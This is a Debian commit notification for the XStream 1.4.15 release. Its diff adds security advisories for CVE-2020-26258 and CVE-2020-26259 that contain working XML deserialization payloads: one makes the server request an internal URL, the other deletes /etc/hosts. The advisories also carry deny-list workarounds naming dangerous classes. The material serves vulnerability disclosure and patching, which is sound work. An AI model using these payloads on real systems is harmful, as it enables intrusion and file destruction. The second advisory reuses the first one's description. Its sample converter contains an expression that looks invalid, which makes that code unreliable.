[Git][java-team/libxstream-java][upstream] New upstream version 1.4.15
Markus Koschany
gitlab at salsa.debian.org
Fri Dec 18 21:35:32 GMT 2020
Markus Koschany pushed to branch upstream at Debian Java Maintainers / libxstream-java
Commits:
aaea7658 by Markus Koschany at 2020-12-18T01:50:56+01:00
New upstream version 1.4.15
- - - - -
22 changed files:
- BUILD.txt
- pom.xml
- settings-template.xml
- xstream-benchmark/pom.xml
- xstream-distribution/pom.xml
- xstream-distribution/src/content/CVE-2020-26217.html
- + xstream-distribution/src/content/CVE-2020-26258.html
- + xstream-distribution/src/content/CVE-2020-26259.html
- xstream-distribution/src/content/changes.html
- xstream-distribution/src/content/download.html
- xstream-distribution/src/content/index.html
- xstream-distribution/src/content/news.html
- xstream-distribution/src/content/security.html
- xstream-distribution/src/content/website.xml
- xstream-hibernate/pom.xml
- xstream-jmh/pom.xml
- xstream/pom.xml
- xstream/src/java/com/thoughtworks/xstream/XStream.java
- xstream/src/java/com/thoughtworks/xstream/io/xml/XmlFriendlyNameCoder.java
- xstream/src/java/com/thoughtworks/xstream/mapper/DefaultMapper.java
- xstream/src/test/com/thoughtworks/acceptance/SecurityVulnerabilityTest.java
- xstream/src/test/com/thoughtworks/acceptance/XmlFriendlyTest.java
Changes:
=====================================
BUILD.txt
=====================================
@@ -11,7 +11,7 @@ mvn clean install
Before deploying:
copy settings-template.xml to ~/.m2/settings.xml adding your Sonatype OSSRH
-username and passwords.
+username and passwords and also your GPG key and password.
To deploy (optionally adding sources and javadoc jars):
mvn deploy
=====================================
pom.xml
=====================================
@@ -14,7 +14,7 @@
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-parent</artifactId>
<packaging>pom</packaging>
- <version>1.4.14</version>
+ <version>1.4.15</version>
<name>XStream Parent</name>
<url>http://x-stream.github.io</url>
<description>
@@ -410,12 +410,12 @@
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
<classifier>tests</classifier>
<type>test-jar</type>
<scope>test</scope>
@@ -423,43 +423,43 @@
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
<classifier>javadoc</classifier>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-hibernate</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-hibernate</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
<classifier>javadoc</classifier>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-jmh</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-jmh</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
<classifier>javadoc</classifier>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-benchmark</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-benchmark</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
<classifier>javadoc</classifier>
<scope>provided</scope>
</dependency>
@@ -635,6 +635,11 @@
<artifactId>jaxb-api</artifactId>
<version>${version.javax.xml.bind.api}</version>
</dependency>
+ <dependency>
+ <groupId>com.sun.xml.ws</groupId>
+ <artifactId>jaxws-rt</artifactId>
+ <version>${version.javax.xml.ws.jaxws.rt}</version>
+ </dependency>
<dependency>
<groupId>org.hibernate</groupId>
@@ -844,6 +849,10 @@
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-gpg-plugin</artifactId>
<version>${version.plugin.maven.gpg}</version>
+ <configuration>
+ <keyname>${gpg.keyname}</keyname>
+ <passphraseServerId>${gpg.keyname}</passphraseServerId>
+ </configuration>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
@@ -1114,7 +1123,7 @@
<version.plugin.maven.deploy>2.3</version.plugin.maven.deploy>
<version.plugin.maven.enforcer>1.4</version.plugin.maven.enforcer>
<version.plugin.maven.failsafe>2.22.0</version.plugin.maven.failsafe>
- <version.plugin.maven.gpg>1.4</version.plugin.maven.gpg>
+ <version.plugin.maven.gpg>1.6</version.plugin.maven.gpg>
<version.plugin.maven.install>2.2</version.plugin.maven.install>
<version.plugin.maven.jar>2.2</version.plugin.maven.jar>
<version.plugin.maven.javadoc>2.10</version.plugin.maven.javadoc>
@@ -1142,6 +1151,7 @@
<version.javax.annotation.api>1.3.2</version.javax.annotation.api>
<version.javax.inject>2.4.0</version.javax.inject>
<version.javax.xml.bind.api>2.3.1</version.javax.xml.bind.api>
+ <version.javax.xml.ws.jaxws.rt>2.2</version.javax.xml.ws.jaxws.rt><!-- Java 5 -->
<version.jmock>1.0.1</version.jmock>
<version.joda-time>1.6</version.joda-time>
<version.junit>3.8.1</version.junit>
@@ -1155,7 +1165,7 @@
<version.org.jdom2>2.0.5</version.org.jdom2>
<version.org.json>20080701</version.org.json>
<version.org.openjdk.jmh>1.21</version.org.openjdk.jmh>
- <version.org.ops4j.pax.exam>3.5.0</version.org.ops4j.pax.exam><!-- java 6 -->
+ <version.org.ops4j.pax.exam>3.5.0</version.org.ops4j.pax.exam><!-- Java 6 -->
<version.org.slf4j>1.6.1</version.org.slf4j>
<version.stax>1.2.0</version.stax>
<version.stax.api>1.0.1</version.stax.api>
=====================================
settings-template.xml
=====================================
@@ -20,6 +20,13 @@
<id>ossrh-staging</id>
<username>your-sonatype.org-id</username>
<password>your-sonatype.org-pwd</password>
- </server>
+ </server>
+ <server>
+ <id>${gpg.keyname}</id>
+ <password>your-gpg-key-pwd</password>
+ </server>
</servers>
+ <properties>
+ <gpg.keyname>your-gpg-keyname</gpg.keyname>
+ </properties>
</settings>
=====================================
xstream-benchmark/pom.xml
=====================================
@@ -14,7 +14,7 @@
<parent>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-parent</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
</parent>
<artifactId>xstream-benchmark</artifactId>
<packaging>jar</packaging>
=====================================
xstream-distribution/pom.xml
=====================================
@@ -14,7 +14,7 @@
<parent>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-parent</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
</parent>
<artifactId>xstream-distribution</artifactId>
<packaging>pom</packaging>
=====================================
xstream-distribution/src/content/CVE-2020-26217.html
=====================================
@@ -22,7 +22,7 @@
<p>All versions until and including version 1.4.13 are affected, if using the version out of the box. No user is
affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
- framework</a> with a white list.</p>
+ framework</a> with a whitelist.</p>
<h2 id="description">Description</h2>
@@ -109,12 +109,12 @@ xstream.fromXML(xml);
input stream.</p>
<h2 id="workaround">Workaround</h2>
- <p>As recommended, use XStream's security framework to implement a white list for the allowed types.</p>
- <p>Users of XStream 1.4.13 who want to use XStream default black list can simply add two lines to XStream's setup code:</p>
+ <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p>
+ <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add two lines to XStream's setup code:</p>
<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
</pre></div>
- <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a black list will have to setup such a list from
+ <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from
scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>,
<em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>java.lang.Void</em> and <em>void</em>.</p>
<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
@@ -139,8 +139,8 @@ xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventH
<h2 id="credits">Credits</h2>
- <p>Chen L reported the issue to XStream and provided the required information to reproduce it. The issue was found
- by Zhihong Tian and Hui Lu, both from Guangzhou University.</p>
+ <p>Chen L found and reported the issue to XStream and provided the required information to reproduce it. He was
+ supported by Zhihong Tian and Hui Lu, both from Guangzhou University.</p>
</body>
</html>
\ No newline at end of file
=====================================
xstream-distribution/src/content/CVE-2020-26258.html
=====================================
@@ -0,0 +1,115 @@
+<html>
+<!--
+ Copyright (C) 2020 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 24. November 2020 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2020-26258</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2020-26258: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams
+ from an arbitrary URL referencing a resource in an intranet or the local host.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.14 are affected running in a Java environment below Java 15, if
+ using the version out of the box. No user is affected, who followed the recommendation to setup
+ <a href="security.html#framework">XStream's security framework</a> with a whitelist.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in a server-side forgery request.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple HashMap and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><map>
+ <entry>
+ <jdk.nashorn.internal.objects.NativeString>
+ <flags>0</flags>
+ <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
+ <dataHandler>
+ <dataSource class='javax.activation.URLDataSource'>
+ <url>http://localhost:8080/internal/:</url>
+ </dataSource>
+ <transferFlavors/>
+ </dataHandler>
+ <dataLen>0</dataLen>
+ </value>
+ </jdk.nashorn.internal.objects.NativeString>
+ <string>test</string>
+ </entry>
+</map>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly
+ available only by manipulating the processed input stream.</p>
+
+ <h2 id="workaround">Workaround</h2>
+ <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p>
+ <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can
+ simply add two lines to XStream's setup code:</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
+xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
+</pre></div>
+ <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream's setup
+ code:</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
+xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
+xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
+</pre></div>
+ <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from
+ scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>,
+ <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>jdk.nashorn.internal.objects.NativeString</em>,
+ <em>java.lang.Void</em> and <em>void</em> and deny several types by name pattern.</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
+xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
+xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
+</pre></div>
+ <p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently
+ know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:</p>
+<div class="Source Java"><pre>xstream.registerConverter(new Converter() {
+ public boolean canConvert(Class type) {
+ return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class
+ || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString")
+ || type == java.lang.Void.class || void.class || Proxy.isProxy(type)
+ || type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream"));
+ }
+
+ public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
+ throw new ConversionException("Unsupported type due to security reasons.");
+ }
+
+ public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
+ throw new ConversionException("Unsupported type due to security reasons.");
+ }
+}, XStream.PRIORITY_LOW);
+</pre></div>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
\ No newline at end of file
=====================================
xstream-distribution/src/content/CVE-2020-26259.html
=====================================
@@ -0,0 +1,118 @@
+<html>
+<!--
+ Copyright (C) 2020 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 06. December 2020 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2020-26259</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long
+ as the executing process has sufficient rights.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.14 are affected running in a Java environment containing the JAX-WS
+ runtime, if using the version out of the box. No user is affected, who followed the recommendation to setup
+ <a href="security.html#framework">XStream's security framework</a> with a whitelist.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in a server-side forgery request.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple HashMap and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><map>
+ <entry>
+ <jdk.nashorn.internal.objects.NativeString>
+ <flags>0</flags>
+ <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
+ <dataHandler>
+ <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
+ <contentType>text/plain</contentType>
+ <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>
+ <tempFile>/etc/hosts</tempFile>
+ </is>
+ </dataSource>
+ <transferFlavors/>
+ </dataHandler>
+ <dataLen>0</dataLen>
+ </value>
+ </jdk.nashorn.internal.objects.NativeString>
+ <string>test</string>
+ </entry>
+</map>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the references file is deleted.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing
+ process has sufficient rights only by manipulating the processed input stream.</p>
+
+ <h2 id="workaround">Workaround</h2>
+ <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p>
+ <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can
+ simply add two lines to XStream's setup code:</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
+xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
+</pre></div>
+ <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream's setup
+ code:</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
+xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
+xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
+</pre></div>
+ <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from
+ scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>,
+ <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>jdk.nashorn.internal.objects.NativeString</em>,
+ <em>java.lang.Void</em> and <em>void</em> and deny several types by name pattern.</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
+xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
+xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
+</pre></div>
+ <p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently
+ know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:</p>
+<div class="Source Java"><pre>xstream.registerConverter(new Converter() {
+ public boolean canConvert(Class type) {
+ return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class
+ || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString")
+ || type == java.lang.Void.class || void.class || Proxy.isProxy(type)
+ || type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream"));
+ }
+
+ public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
+ throw new ConversionException("Unsupported type due to security reasons.");
+ }
+
+ public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
+ throw new ConversionException("Unsupported type due to security reasons.");
+ }
+}, XStream.PRIORITY_LOW);
+</pre></div>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
\ No newline at end of file
=====================================
xstream-distribution/src/content/changes.html
=====================================
@@ -34,6 +34,45 @@
<p>Not yet released.</p>
-->
+ <h1 id="1.4.15">1.4.15</h1>
+
+ <p>Released December 13, 2020.</p>
+
+ <p class="highlight">This maintenance release addresses the security vulnerabilities
+ <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
+ unmarshalling for XStream instances with uninitialized security framework.</p>
+
+ <h2>Minor changes</h2>
+
+ <ul>
+ <li>GHI:#226: XmlFriendlyNameCoder does not accept '9' as valid character in an XML name.</li>
+ <li>GHPR:#228: DefaultMapper should handle IllegalArgumentException thrown by Class.forName().</li>
+ </ul>
+
+ <h2>Stream compatibility</h2>
+
+ <ul>
+ <li>The type jdk.nashorn.internal.objects.NativeString and the internal JAX-WS type ReadAllStream.FileStream
+ are now part of the default blacklist and the deserialization of XML containing one of the two types will fail.
+ You will have to enable these types by explicit configuration, if you need them.</li>
+ </ul>
+
+ <h2>Delivery</h2>
+
+ <p>Any XStream release can run with a minimal Java runtime environment of Java 1.4 as long as this environment will
+ process only requested classes of the jar file. Until version 1.4.14 XStream was delivered also as special Java 7
+ version for Android, because Dalvik scans all classes and fails at classes requiring a higher runtime version. However, this
+ special version will not work in a normal Java 8 environment or higher and was never meant do so.</p>
+
+ <p>Unfortunately, this version has to be build always after the standard version due to the build sequence. The
+ latest version in Maven Central however is always the one that has been deployed last independently from the time
+ of publishing. This creates an annoyance now in GitHub for any project using the Dependabot service which creates
+ automated pull requests with updates to the latest XStream version, because it injects now the special Java 7
+ version that probably breaks these projects.</p>
+
+ <p>Users who still require a special version for Java 7 will have to build this artifact now on their own. Users
+ for even older Java environments had always to do so anyway.</p>
+
<h1 id="1.4.14">1.4.14</h1>
<p>Released November 16, 2020.</p>
@@ -46,8 +85,8 @@
<ul>
<li>The types java.lang.ProcessBuilder and javax.imageio.ImageIO$ContainsFilter are now part of the default
- blacklist and the deserialization of XML containing one of the two types will fail. You will must enable these
- types by explicit configuration, if you need them.</li>
+ blacklist and the deserialization of XML containing one of the two types will fail. You will have to enable
+ these types by explicit configuration, if you need them.</li>
</ul>
<h1 id="1.4.13">1.4.13</h1>
=====================================
xstream-distribution/src/content/download.html
=====================================
@@ -18,21 +18,19 @@
<p><a href="versioning.html">About XStream version numbers...</a></p>
- <h1 id="stable">Stable Version: <span class="version">1.4.14</span></h1>
+ <h1 id="stable">Stable Version: <span class="version">1.4.15</span></h1>
<ul>
- <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.14/xstream-distribution-1.4.14-bin.zip">Binary distribution:</a></b>
+ <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-bin.zip">Binary distribution:</a></b>
Contains the XStream jar files, the Hibernate and Benchmark modules and all the dependencies.</li>
- <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.14/xstream-distribution-1.4.14-src.zip">Source distribution:</a></b>
+ <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-src.zip">Source distribution:</a></b>
Contains the complete XStream project as if checked out from the Subversion version tag.</li>
- <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.14/xstream-1.4.14.jar">XStream Core only:</a>
+ <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.15/xstream-1.4.15.jar">XStream Core only:</a>
The xstream.jar only as it is downloaded automatically when it is referenced as Maven dependency.</b></li>
- <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.14/xstream-hibernate-1.4.14.jar">XStream Hibernate module:</a></b>
+ <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.15/xstream-hibernate-1.4.15.jar">XStream Hibernate module:</a></b>
The xstream-hibernate.jar as it is downloaded automatically when it is referenced as Maven dependency.</li>
- <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.14/xstream-jmh-1.4.14-app.zip">XStream JMH module:</a></b>
+ <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.15/xstream-jmh-1.4.15-app.zip">XStream JMH module:</a></b>
The xstream-jmh-app.zip as standalone application with start scripts and all required libraries.</li>
- <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.14-java7/xstream-1.4.14-java7.jar">XStream Core for Java 7 only:</a>
- The xstream.jar only <a href="faq.html#Compatibility_Android">without the Java 8 stuff</a> as it is downloaded automatically when it is referenced as Maven dependency.</b></li>
</ul>
<h1 id="maven">Maven Central Repository</h1>
@@ -43,7 +41,7 @@
<div class="Source XML"><pre><dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
</dependency></pre></div>
<h1 id="previous-releases">Previous Releases</h1>
=====================================
xstream-distribution/src/content/index.html
=====================================
@@ -73,16 +73,15 @@
<h1 id="news">Latest News</h1>
- <h2 id="1.4.14"><b>November 16, 2020</b> XStream 1.4.14 released</h2>
+ <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2>
- <p class="highlight">This maintenance release addresses the security vulnerability
- <a href="CVE-2020-26217.html">CVE-2020-26217</a>, reported originally as CVE-2017-9805 for Struts' XStream
- Plugin, an arbitrary execution of commands when unmarshalling for XStream instances with uninitialized security
- framework.</p>
+ <p class="highlight">This maintenance release addresses the security vulnerabilities
+ <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
+ unmarshalling for XStream instances with uninitialized security framework.</p>
- <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
+ <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
- <p>Note, the next major release 1.5 will require Java 8.</p>
+ <p>Note, the next major release 1.5 will require Java 8.</p>
</body>
</html>
=====================================
xstream-distribution/src/content/news.html
=====================================
@@ -16,6 +16,16 @@
<body>
+ <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2>
+
+ <p class="highlight">This maintenance release addresses the security vulnerabilities
+ <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
+ unmarshalling for XStream instances with uninitialized security framework.</p>
+
+ <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
+
+ <p>Note, the next major release 1.5 will require Java 8.</p>
+
<h2 id="1.4.14"><b>November 16, 2020</b> XStream 1.4.14 released</h2>
<p class="highlight">This maintenance release addresses the security vulnerability
=====================================
xstream-distribution/src/content/security.html
=====================================
@@ -29,14 +29,15 @@
<p>The provided XML data is used by XStream to unmarshal Java objects. This data can be manipulated by injecting
the XML representation of other objects, that were not present at marshalling time. An attacker could take
- advantage of this to execute arbitrary code or shell commands in the context of the server running the XStream
- process. A concrete case is described in <a href="CVE-2013-7285.html">CVE-2013-7285</a> and
- <a href="CVE-2020-26217.html">CVE-2020-26217</a>.</p>
+ advantage of this to access private data, delete local files, execute arbitrary code or shell commands in the
+ context of the server running the XStream process. Concrete cases are described in
+ <a href="CVE-2013-7285.html">CVE-2013-7285</a>, <a href="CVE-2020-26217.html">CVE-2020-26217</a>,
+ <a href="CVE-2020-26258.html">CVE-2020-26258</a>, and <a href="CVE-2020-26259.html">CVE-2020-26259</a>.</p>
- <p>Note that the XML data can be manipulated on different levels. For example, manipulating values on existing
- objects (such as a price value), or breaking the format and causing the XML parser to fail. The latter case will
- raise an exception, but the former case must be handled by validity checks in any application which processes
- user-supplied XML. A worst case scenario is the injection of arbitrary code or shell commands, as noted above.
+ <p>Note, that the XML data can be manipulated on different levels. For example, manipulating values on existing
+ objects (such as a price value), accessing private data, or breaking the format and causing the XML parser to fail.
+ The latter case will raise an exception, but the former case must be handled by validity checks in any application
+ which processes user-supplied XML. A worst case scenario is the injection of arbitrary code or shell commands, as noted above.
Even worse, <a href="CVE-2017-7957.html">CVE-2017-7957</a> describes a case to crash the Java Virtual Machine
causing a Denial of Service.</p>
@@ -64,11 +65,12 @@
<p>More scenarios have been identified for types that are already delivered with the Java runtime. Looking at
well-known and commonly used Java libraries libraries such as ASM, CGLIB, or Groovy, the possibility for more
- exploits is very high.</p>
+ exploits is very high. A class like InvokerTransformer of Apache Commons Collections has a high potential for
+ attacks.</p>
- <p class="hightlight">Therefore creates a black list for special classes only a scenario for a false security,
- because no-one can assure, that no other scenario arise. A better approach is a whitelist i.e. the allowed class
- types are setup explicitly. This will be the default for XStream 1.5.x.</p>
+ <p class="hightlight">A blacklist for special classes only creates therefore a scenario for a false security,
+ because no-one can assure, that no other scenario arise. A better approach is the usage of a whitelist i.e. the
+ allowed class types are setup explicitly. This will be the default for XStream 1.5.x (see below).</p>
<p>Starting with XStream 1.4.7, an instance of the EventHandler is no longer handled by default. You have to
explicitly register a ReflectionConverter for the EventHandler type, if your application has the requirement to
@@ -91,8 +93,8 @@
framework supports the setup of a blacklist or whitelist scenario. Any application should use this feature to
limit the danger of arbitrary command execution if it deserializes data from an external source.</p>
- <p>XStream itself sets up a black list by default, i.e. it blocks all currently known critical classes of the Java
- runtime. Main reason for the black list is compatibility, because otherwise newer versions of XStream 1.4.x can no
+ <p>XStream itself sets up a blacklist by default, i.e. it blocks all currently known critical classes of the Java
+ runtime. Main reason for the blacklist is compatibility, because otherwise newer versions of XStream 1.4.x can no
longer be used as drop-in replacement. Unfortunately this provides a false sense of security. Every XStream
client should therefore switch to a whitelist on its own as soon as possible. XStream itself will use a whitelist
as default starting with 1.5.x and only clients that have also changed their setup will be able to use this newer
@@ -121,7 +123,9 @@
<p>Noted above, it might be possible that other combinations are found with the Java runtime itself, or other
commonly-used Java libraries that allow a similar vulnerability like the known case using the Java Beans
EventHandler. To prevent such a possibility at all, XStream version 1.4.7 and above contains a security framework,
- allowing application developers to define which types are allowed to be unmarshalled with XStream.</p>
+ allowing application developers to define which types are allowed to be unmarshalled with XStream. Use
+ <a href="javadoc/com/thoughtworks/xstream/XStream.html#setupDefaultSecurity-com.thoughtworks.xstream.XStream-">XStream.setupDefaultSecurity()</a>
+ to install the default whitelist of 1.5.x already with 1.4.10 or higher.</p></p>
